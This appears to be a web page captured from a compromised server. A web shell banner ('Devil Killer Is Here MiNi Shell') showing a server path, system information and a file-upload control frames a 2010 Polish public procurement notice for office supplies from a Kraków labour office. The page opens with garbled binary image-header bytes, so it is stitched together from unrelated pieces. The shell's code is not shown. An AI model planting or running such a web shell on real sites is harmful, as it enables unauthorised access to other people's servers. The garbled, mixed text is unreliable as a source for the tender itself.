JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100401/73633-N-2010.html

<p class="kh_header"><b>Kraków: postępowanie o udzielenie zamówienia publicznego 
na dostawę materiałów biurowych dla Urzędu Pracy Powiatu Krakowskiego
znak sprawy: ZP- 271/13/2010</b><br>
<b>Numer ogłoszenia: 73633 - 2010; data zamieszczenia: 01.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Pracy Powiatu Krakowskiego , ul. Mazowiecka 21, 30-019 Kraków, woj. małopolskie, tel. 012 2997425, 012 6237480, faks 012 6325215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uppk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> postępowanie o udzielenie zamówienia publicznego 
na dostawę materiałów biurowych dla Urzędu Pracy Powiatu Krakowskiego
znak sprawy: ZP- 271/13/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa fabrycznie nowych, wolnych od wad materiałów biurowych szczegółowo opisanych w załączniku nr 1 do SIWZ o parametrach zgodnych z wymogami zamawiającego. 
2.	Okres przydatności do użycia zamawianych materiałów biurowych musi wynosić minimum 12 miesięcy od daty dostawy. W przypadku kalkulatorów - okres rękojmi wyniesie minimum 24 miesiące. 
3.	Na etapie realizacji zamówienia Zamawiający zastrzega sobie prawo do ewentualnej zmiany ilości zakupionych materiałów biurowych stosownie do jego potrzeb. Zmiana dotyczyć może tylko materiałów biurowych określonych w specyfikacji technicznej np. zamawiający w okresie obowiązywania umowy zamówi więcej ryz papieru a mniej segregatorów. Zmiany nie mogą dotyczyć materiałów biurowych, które nie zostały wyszczególnione w załączniku nr 1. 
4.	Dostawy będą następować systematycznie, stosownie do potrzeb Zamawiającego, po wcześniejszym zamówieniu określonych asortymentów. Zamówienie to Zamawiający przekaże Wykonawcy faxem, elektronicznie lub pisemnie. Zamówienie wskazywać będzie asortymenty oraz  ilości, które Wykonawca dostarczy, tj. dowiezie i wniesie do wskazanego pomieszczenia, do poniższych lokalizacji: 
Siedziba główna UPPK, ul. Mazowiecka 21, 30 - 019 Kraków;
Filia w Skawinie, Ul. Ogrody 17, 32 - 050 Skawina;
Archiwum Zakładowe, Ul. Kopernika 13, 32 - 050 Skawina;
Filia w Krzeszowicach, Ul. Kościuszki 3, 32 - 065 Krzeszowice;
Filia w Słomnikach, ul. Kościuszki 64, 32 - 090 Słomniki.
5.	Wykonawca zobowiązany będzie do dostarczenia zamówionych materiałów biurowych w terminie do 3 dni od daty otrzymania zamówienia. 
6.	Zamawiający nie dopuszcza składania ofert częściowych.
7.	Zamawiający nie dopuszcza składania ofert wariantowych.
załącznik nr 1:
1	Papier A4 białość   CIE 146,  80g/m2 (Ryza=500 ark.), ilość 1700
2	Papier A3 biały CIE 146, gramatura 80g/m2 (Ryza=500 ark.), ilość	2
3	Papier A4, w kolorze intensywnej zieleni, 80g/m2 (Ryza=500 ark.), ilość 15
4	Papier A4 w kolorze intensywnej żółci 80g/m2 (Ryza=500 ark.), ilość 15
5	Papier A4 w kolorze pomarańczy 80g/m2	(Ryza=500 ark.), ilość	10
6	Papier A4 w kolorze czerwieni 80g/m2	(Ryza=500 ark.), ilość	5
7	Papier A4 w kolorze niebieskim (błękit) 80g/m2	(Ryza=500 ark.), ilość	15
8	Papier A4 w kolorze szarym 80g/m2	(Ryza=500 ark.), ilość	8
9	Papier A4 w kolorze lila 80g/m2	(Ryza=500 ark.), ilość	5
10	Papier A4 w kolorze szafirowym 80g/m2	(Ryza=500 ark.), ilość	5
11	Papier A4 w kolorze jasno różowym/pastelowo różowym 80g/m2	(Ryza=500 ark.), ilość	1
12	Mix kolorowy A3	(opak. = 100 ark.), ilość 1
13	Papier komputerowy 375x12x2 (Opak.), ilość 20
14	Papier komputerowy 375x12x3 (Opak.), ilość 7
15	Papier komputerowy 375x12x1 - 70g (opak.), ilość 1
16	Papier komputerowy 240x12x1 - 70g (opak.), ilość 1
17	Papier komputerowy 240x 12x3 (opak.), ilość 3
18	Papier kancelaryjny w kratkę	(Ryza=500 ark.), ilość2
19	Teczka tekturowa wiązana biała A4	szt. 7500
20	Teczka zawieszkowa tekturowa biała A4	szt.500
21	Teczka z gumką , format A4,z trzema zakładkami zabezpieczającymi, wykonana z mocnego kartonu, gumka w kolorze teczki - kolor niebieski	szt.	25
22	Teczka z gumką , format A4,z trzema zakładkami zabezpieczającymi, wykonana z mocnego kartonu, gumka w kolorze teczki - kolor czerwony	szt.	275
23	Teczka z gumką , format A4,z trzema zakładkami zabezpieczającymi, wykonana z mocnego kartonu, gumka w kolorze teczki - kolor popielaty	szt.	900
24	Teczka z gumką , format A4,z trzema zakładkami zabezpieczającymi, wykonana z mocnego kartonu, gumka w kolorze teczki - kolor zielony	szt.	4000
25	Teczka z gumką , format A4,z trzema zakładkami zabezpieczającymi, wykonana z mocnego kartonu, gumka w kolorze teczki - kolor żółty	szt.	2000
26	Teczka z gumką , format A4,z trzema zakładkami zabezpieczającymi, wykonana z mocnego kartonu, gumka w kolorze teczki - kolor pomarańczowy	szt.	1050
27	Teczka z gumką , format A4,z trzema zakładkami zabezpieczającymi, wykonana z mocnego kartonu, gumka w kolorze teczki - kolor fioletowy	szt.	350
28	Teczka z gumką , format A4,z trzema zakładkami zabezpieczającymi, wykonana z mocnego kartonu, gumka w kolorze teczki - kolor czarny	szt.	60
29	Teczka z gumką , format A4,z trzema zakładkami zabezpieczającymi, wykonana z mocnego kartonu, gumka w kolorze teczki - kolor granatowy	szt.	30
30	Teczka z gumką , format A4,z trzema zakładkami zabezpieczającymi, wykonana z mocnego kartonu, gumka w kolorze teczki - kolor biały	szt.	50
31	Segregator A4 7,5 na dolnych krawędziach metalowe okucia, oklejony wewnątrz i na zewnątrz poliolefiną, otwór na palec-kolor niebieski	szt.	80
32	Segregator A4 7,5 na dolnych krawędziach metalowe okucia, oklejony wewnątrz i na zewnątrz poliolefiną, otwór na palec-kolor czerwony	szt.	47
33	Segregator A4 7,5 na dolnych krawędziach metalowe okucia, oklejony wewnątrz i na zewnątrz poliolefiną, otwór na palec-kolor popielaty	szt.	70
34	Segregator A4 7,5 na dolnych krawędziach metalowe okucia, oklejony wewnątrz i na zewnątrz poliolefiną, otwór na palec-kolor zielony	szt.	15
35	Segregator A4 7,5 na dolnych krawędziach metalowe okucia, oklejony wewnątrz i na zewnątrz poliolefiną, otwór na palec-kolor zółty	szt.	100
36	Segregator A4 7,5 na dolnych krawędziach metalowe okucia, oklejony wewnątrz i na zewnątrz poliolefiną, otwór na palec-kolor pomarańczowy	szt.	40
37	Segregator A4 7,5 na dolnych krawędziach metalowe okucia, oklejony wewnątrz i na zewnątrz poliolefiną, otwór na palec-kolor fioletowy	szt.	25
38	Segregator A4 7,5 na dolnych krawędziach metalowe okucia, oklejony wewnątrz i na zewnątrz poliolefiną, otwór na palec-kolor brązowy	szt.	1
39	Segregator A4 7,5 na dolnych krawędziach metalowe okucia, oklejony wewnątrz i na zewnątrz poliolefiną, otwór na palec-kolor czarny	szt.	65
40	Segregator A4 7,5 na dolnych krawędziach metalowe okucia, oklejony wewnątrz i na zewnątrz poliolefiną, otwór na palec-kolor granatowy	szt.	80
41	Segregator A4 7,5 na dolnych krawędziach metalowe okucia, oklejony wewnątrz i na zewnątrz poliolefiną, otwór na palec-kolor kawa z mlekiem/beżowy	szt.	35
42	Segregator A4 7,5 na dolnych krawędziach metalowe okucia, oklejony wewnątrz i na zewnątrz poliolefiną, otwór na palec-kolor bordowy	szt.	6
43	Segregator A4 7,5 na dolnych krawędziach metalowe okucia, oklejony wewnątrz i na zewnątrz poliolefiną, otwór na palec-kolor jasno różowy/pastelowy różowy	szt.	4
44	Segregator A4  5 na dolnych krawędziach metalowe okucia oklejony wewnątrz i na zewnątrz poliolefiną, otwór na palec -kolor granatowy	szt.	20
45	segregator A4   3,5  -kolor czerwony - 2 kółka	szt.	10
46	segregator A4   3,5 -kolor popielaty - 2 kółka	szt.	20
47	segregator A4   3,5  -kolor zielony - 2 kółka	szt.	15
48	segregator A4   3,5  -kolor żółty - 2 kółka	szt.	15
49	segregator A 4  3,5 - kolor jasno różowy/pastelowy różowy - 2 kółka	szt.	4
50	segregator A4   5  -kolor pomarańczowy	szt.	25
51	segregator A4   3,5  -kolor czarny - 2 kółka	szt.	15
52	segregator A4   5  -kolor  fioletowy	szt.	15
53	segregator A4   3,5  -kolor  brązowy/bordowy - 2 kółka	szt.	4
54	segregator A4   3,5  -kolor  granatowy/niebieski - 2 kółka	szt.	26
55	segregator A4   3,5  -kolor  kawa z mlekiem/beżowy - 2 kółka	szt.	20
56	Skoroszyt zawieszkowy plastikowy, format A4, tylna okładka nieprzeźroczysta  wykonany z folii PP - kolor niebieski	szt.	470
57	Skoroszyt zawieszkowy plastikowy, format A4, tylna okładka nieprzeźroczysta  wykonany z folii PP - kolor czerwony	szt.	120
58	Skoroszyt zawieszkowy plastikowy, format A4, tylna okładka nieprzeźroczysta  wykonany z folii PP - kolor popielaty	szt.	80
59	Skoroszyt zawieszkowy plastikowy, format A4, tylna okładka nieprzeźroczysta  wykonany z folii PP - kolor żółty	szt.	35
60	Skoroszyt zawieszkowy plastikowy, format A4, tylna okładka nieprzeźroczysta  wykonany z folii PP - kolor pomarańczowy	szt.	50
61	Skoroszyt zawieszkowy plastikowy, format A4, tylna okładka nieprzeźroczysta  wykonany z folii PP - kolor zielony	szt.	30
62	Skoroszyt zawieszkowy plastikowy, format A4, tylna okładka nieprzeźroczysta  wykonany z folii PP - kolor czarny	szt.	40
63	Skoroszyt zawieszkowy plastikowy, format A4, tylna okładka nieprzeźroczysta  wykonany z folii PP - kolor granatowy	szt.	70
64	Skoroszyt zawieszkowy plastikowy, format A4, tylna okładka nieprzeźroczysta  wykonany z folii PP - kolor różowy		50
65	Etykiety samoprzylepne na płyty CD	szt.	200
66	Długopis na sprężynce, pionowo utrzymywany na mocowanym do blatu podajniku	szt.	230
67	Marker wodoodporny, czarny, z cienką końcówką do opisywania płyt szt.40
68	Zeszyt akademicki A4 100-kartkowy w twardej oprawie	szt.	45
69	Korektor w taśmie o ergonomicznym kształcie w przeźroczystej obudowie, silikonowa taśma wytrzymała na zerwanie i wilgoć z suchym systemem korekcji umożliwiającym natychmiastowe pisanie. Taśma o długości 14 m i szerokości 8,4 mm, możliwość wymiany wkładu	szt.	50
70	Przybornik transparentny na biurko na artykuły piszące, wykonany z przezroczystego polistyrenu odpornego na pęknięcia.	Szt	5
71	Koperta listowa, biała, format DL samoklejąca bez okienka	opak. = 1000 szt	4
72	Koperta listowa, biała, samoklejąca, format C6, bez okna opak. = 1000 szt 45
73	Koperta C 5, biała, samoprzylepna z paskiem, klej po krótkim boku	opak. = 500 szt	8
74	Koperta biała, samoklejąca, bez okna, format C4 (opak=250szt)	opak. = 250 szt	40
75	Karton archiwizacyjny na pisma, zamykane, format A4, grzbiet 100mm, pojemność 1000 kartek, otwór na palec	szt.	40
76	Karton archiwizacyjny zbiorczy otwierany z góry, biały, przeznaczony do transportu i przechowywania dokumentów, miejsca do opisu zawartości na bocznych ścianach, uchwyty ułatwiające przenoszenie, wymiary 563x370x260 mm	szt.	30
77	Koszulki krystaliczne na dokumenty A4, (1opak=100szt) opak. = 100 szt	200
78	Skorowidz szyty w twardej oprawie, 96-kartkowy, format A4	szt.	25
79	Skorowidz szyty w twardej oprawie, 96-kartkowy, format 1/2 lub 2/3 A4	szt.	5
80	Dziennik korespondencyjny A4 w twardej oprawie, 
288- kartkowy	szt.	20
81	Pocztowa książka nadawcza	szt.	90
82	Grzbiety do bindowania 8 mm	opak. = 100 szt	1
83	Grzbiety do bindowania 12 mm	opak. = 100 szt	1
84	Okładki do bindowania (przody) - foliowe, bezbarwne, przezroczyste, 0,20 mm	opak. = 100 szt	2
85	Okładki do bindowania (tyły) -	opak. = 100 szt	2
86	Album ofertowy/teczka ofertowa - wyposażona w 20 wewnętrznych i przeźroczystych kieszeni oraz zewnętrzną etykietę opisową	szt.	10
87	Pojemnik składany na dokumenty, katalogi etc., o formacie A4, wykonany z PCV, grzbiet ok. 70 mm, kolor czerwony	szt.	10
88	Pojemnik składany na dokumenty, katalogi etc., o formacie A4, wykonany z PCV lub oklejony ekologiczną folią polipropylenową o strukturze płótna, grzbiet 70mm, 
kolor żółty	szt	10
89	Plastikowe stojaczki wąskie na ulotki, pod giełdy, bazary i targi pracy, format 1/3 A4	(opak. = 3 szt)	2
90	Plastikowe stojaczki formatu A4 na plakietki giełdy, bazary i targi pracy	szt.	15
91	Lampka biurowa	szt.	3
92	Zeszyt A-4 miękka oprawa 96 kart	szt.	2
93	Naklejki  70x25.4cm	opak = 100ark	9
94	Naklejki 38x21,2cm	opak = 100ark	5
95	Naklejki 70x32cm	opak = 100ark	5
96	Naklejki A4	opak = 100ark	5
97	Ołówki HB	szt.	10
98	Spray do czyszczenia tablic suchościeralnych	szt.	5
99	Klip deska (sztywna podkładka do pisania) format A4 w kolorze bordowym i/lub czarnym	szt	10
100	Teczka z gumką , format A4,z trzema zakładkami zabezpieczającymi, wykonana z mocnego kartonu, gumka w kolorze teczki - kolor granatowy	szt.	60
101	Tusz do pieczątek czarny	szt.	11
102	Taśma samoprzylepna pakowa	szt.	10
103	Zeszyt w kratkę, A5 60-kartkowy	szt.	50
104	Kalkulator biurowy z klawiszem cofania i podwójnym 0	szt.	20
105	Sznurek bawełniany szary, długość co najmniej 120 m. (szt.=120 metrów), 15
106	Teczka do podpisu na dokumenty w formacie A4, okładka wykonana z PP, na przedniej okładce okienko do opisu zawartości książki, przegródki z 4 otworami do podglądu zawartości książki, grzbiet rozciągliwy (harmonijkowy), 20 przegródek w kolorze czarnym	szt.	10
107	Teczka do podpisu na dokumenty w formacie A4, okładka wykonana z PP, na przedniej okładce okienko do opisu zawartości książki, przegródki z 4 otworami do podglądu zawartości książki, grzbiet rozciągliwy (harmonijkowy), 20 przegródek w kolorze czerwonym lub niebieskim	Szt.	15
108	Zszywacz długoramienny, listwa ogranicznika regulowana do formatów od A6 do A2, US Norm, folio, posiadająca skalę calową i milimetrową, zszywający do 40 kartek, głębokość wsuwania kartek 299mm, gwarancja 10lat.	szt.	3
109	Lista płac Zo-83 b	bloczek	5
110	Książka ewidencji wyjść z pracy	szt.	11
111	Kartoteki wynagrodzeń Z o 94 a	szt.	100
112	Kartoteka ewidencji czasu pracy Pu OS-225b	szt.	250
113	Karta kontowa Sr trwałe K 281	bloczki	1
114	Zaświadczenie o zatrudnieniu Os 231	bloczki	5
115	Delegacje służbowe i zagraniczne	bloczki	10
116	Polecenie przelewu 06	bloczki	2
117	Książka ewidencji kluczy, teczek, pieczęci i pojemników	szt.	25
118	Tusz do pieczątek czerwony	szt.	70
119	Ołówek B2	szt.	30
120	Datownik samotuszujący, wielkość cyfr/liter 3,8 mm w obudowie z tworzywa ABS	szt.	1
121	Spinacze metalowe okrągłe 50 (opak. = 1000 szt) 15
122	Poduszka do pieczęci kauczukowej z wkładem materiałowym o wymiarach    5,5 cm x  8,5 cm	szt.	10
123	Taśma dwustronna 50 mm x 25 m	szt.	10
124	Mix kolorowy A4 - 5 kolorów w opakowaniu	(250 ark./op.)	21
125	Papier A4 białość   CIE 146,  120g/m2	(Ryza=500 ark.)	2
126	Papier A4 białość   CIE 146,  200g/m2	(Ryza=500 ark.)	20
127	Taśma klejąca biurowa przeźroczysta  18mm x 20m	szt.	80
128	Marker  permanentny, wodoodporny, piszący na wszystkich powierzchniach, końcówka okrągła, kolor czarny	szt.	150
129	Markery permanentne przeznaczone do pisania na tablicach papierowych, tusz nie przebijający przez papier, grubość linii pisania ok. 2,5 mm kpl. = 4 szt w różnych kolorach	15
130	Pisaki kolorowe 4 kolory	Kpl	70
131	Zakreślacze fluorescencyjne do znaczenia tekstu praktycznie na każdym rodzaju papieru, nietoksyczny tusz charakteryzuje się wysoką wydajnością oraz trwałością - nie rozmazuje się, końcówka ścięta, grubość linii pisania 1-5 mm, długość linii pisania 140 m, komplet 6 szt w etui	 Kpl	80
132	Blok biurowy w kratkę, format A4-100 kartek	szt	150
133	Karteczki samoprzylepne w formacie 75x75mm, w kolorze żółtym, bloczek zawiera 100 karteczek	(bloczek = 100 karteczek)	400
134	Karteczki indeksujące samoprzylepne  w formacie 20x50mm  i kolorach pomarańczowym, żółtym, zielonym, różowym. Bloczek zawiera 4x 50 karteczek	(bloczek zawiera 4x50 karteczek)	150
135	Dziurkacz biurowy dziurkujący do 25 kartek posiadający ogranicznik formatu A4, A5, A6, 8x8x8.	szt.	15
136	Linijka 20 cm	szt.	40
137	Nożyczki ze stali nierdzewnej, uchwyt z tworzywa, długość ostrza 25 cm	szt.	20
138	Długopis żelowy z przeźroczystym korpusem, wymiennym wkładem KF6, wodoodporny i nieblaknący tusz żelowy zawiera specjalny pigment, który nadaje kolorom mF6, wodoodporny i nieblaknący tusz żelowy zawiera specjalny pigment, który nadaje kolorom intensywność i wyrazistość, wkład w kolorze niebieskim.	szt.	750
139	Długopis żelowy z przeźroczystym korpusem, wymiennym wkładem KF6, wodoodporny i nieblaknący tusz żelowy zawiera specjalny pigment, który nadaje kolorom intensywność i wyrazistość, wkład w kolorze czarnym.	szt.	100
140	Długopis żelowy z przeźroczystym korpusem, ergonomicznym uchwytem, wymiennym wkładem R-140, grubość linii pisania 0,3mm, długość linii pisania 600m, wkład w kolorze zielonym	szt.	60
141	Długopis żelowy z przeźroczystym korpusem, ergonomicznym uchwytem, wymiennym wkładem R-140, grubość linii pisania 0,3mm, długość linii pisania 600m, wkład w kolorze czerwonym	szt.	60
142	Długopis w kolorze niebieskim, grubość linii 0,5 mm, długość linii pisania 4000 m	szt.	100
143	Długopis w kolorze zielonym, grubość linii 0,5 mm, długość linii pisania 4000 m	szt.	20
144	Długopis w kolorze czerwonym, grubość linii 0,5 mm, długość linii pisania 4000 m	szt.	20
145	Kolorowe długopisy- 6 kolorów mix	kpl.	5
146	Spinacze metalowe okrągłe  33, pakowane 10x100 (opak. = 1000 szt)	40
147	Klips metalowy do papieru 19 mm	opak. = 12 szt	30
148	Klips metalowy do papieru 51 mm	opak. = 12 szt	10
149	Klips metalowy do papieru 32mm	opak. = 12 szt	50
150	Zszywacz zszywający do 30 kartek, zintegrowany rozszywacz, na zszywki 24/6, 26/6, zszywanie zamknięte i otwarte, zszywacz ładowany od góry, głębokość wsuwania kartek 60mm, 10 lat gwarancji pojemność 100 zszywek	szt.	30
151	Zszywki biurowe 24/6 ocynkowane - duże opakowania, pakowane 10x1000	(opak.= 10 000 szt) 35
152	Kołki kolorowe do tablicy korkowej	opak.= 50 szt	40
153	Klej w płynie do papieru i tektury, szybkoschnący, nietoksyczny	szt.	100
154	Klej w tubce, biały, zawartość 50g	szt.	50
155	Korektor w płynie z gąbeczką korygującą, przygotowany na bazie wody, szybkoschnący  (20ml)	szt.	70
156	Blok do flipcharta, ilość kartek 50, gładki , wymiar 100 cm x 65 cm	szt.	10
157	Blok do flipcharta, ilość kartek 20,  w kratkę , wymiar 100 cm x 65 cm	szt.	10
158	Zestaw markerów z okrągłą końcówką do tablic suchościeralnych w kolorach: czerwony, niebieski, zielony, czarny + gąbka	kpl	20
159	Temperówka z kontenerkiem na wiórki	szt.	4
160	Ołówek - twardość HB, szczególnie odporny na złamania dzięki klejonemu na całej długości grafitowi, wykonany z mocnego cedrowego drewna, które się łatwo temperuje	szt.	20
161	Gumka do mazania, usuwająca linie grafitowe i barwne w sposób dokładny i nie pozostawiający żadnych śladów	szt.	10
162	Rozszywacz	szt.	4
163	Półka/tacka na dokumenty, posiadająca prowadnicę umożliwiającą układanie jednej szuflady na drugą, ze specjalnie wyprofilowanym i wyciętym przodem, ułatwiającym wkładanie i wyjmowanie dokumentów, kolor przezroczysty	szt.	36
164	Taśma mocująca, służąca do przyklejenia plakatów, kartek z informacjami itp., bezzapachowa, nie pozostawiająca plam po odklejeniu	szt.	10.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy z dn. 29 stycznia 2004 r. Prawo zamówień publicznych:
2. Pełnomocnictwo dla osoby podpisującej ofertę lub inny dokument, z którego wynikać będzie jej umocowanie do reprezentowania wykonawcy w postępowaniach przetargowych, w tym podpisywania dokumentów przetargowych;
3. Formularz dotyczący podwykonawców z określeniem ich udziału w wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
